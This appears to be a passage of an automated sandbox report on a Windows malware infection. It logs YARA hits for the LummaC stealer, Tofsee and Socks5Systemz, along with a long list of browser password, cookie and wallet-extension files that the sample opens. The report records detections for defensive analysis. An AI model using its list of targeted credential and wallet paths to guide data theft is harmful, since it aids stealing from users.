                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpCode function: 4_2_0045892C GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle,4_2_0045892C
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exeCode function: 1_2_10002C37 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,1_2_10002C37
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpCode function: 4_2_00455588 GetUserNameA,4_2_00455588
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_0277B211 GetLocalTime,FileTimeToLocalFileTime,SystemTimeToFileTime,GetTimeZoneInformation,wsprintfA,10_2_0277B211
                    Source: C:\Users\user\AppData\Roaming\bWZ9UJzQuKA\DrjfIAN86u.exeCode function: 3_2_00405CE4 GetVersionExA,3_2_00405CE4
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                    Source: regsvr32.exe, 0000000A.00000002.2572840164.000000000283A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: procdump.exe
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2180362705.0000000000A17000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2206946004.0000000000A17000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2162182384.00000000009E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                    Stealing of Sensitive Information

                    barindex
                    Yara detected CryptOne packer
                    Source: Yara matchFile source: 00000000.00000002.1366301162.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Yara detected LummaC Stealer
                    Source: Yara matchFile source: 0000000D.00000002.2209776881.00000000039E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: vn6ZAuKJ8m7U3.exe PID: 6776, type: MEMORYSTR
                    Source: Yara matchFile source: 0000000D.00000003.2183865599.00000000028B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                    Yara detected Socks5Systemz
                    Source: Yara matchFile source: 00000005.00000002.2574422459.0000000002CD9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2574561504.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: ntfs2fat32converter102.exe PID: 8920, type: MEMORYSTR
                    Yara detected Tofsee
                    Source: Yara matchFile source: 10.2.regsvr32.exe.5512e6.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.regsvr32.exe.2859196.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000A.00000002.2572533022.0000000002780000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2572238453.0000000000550000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2572840164.000000000283A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2572109142.0000000000520000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 9056, type: MEMORYSTR
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json
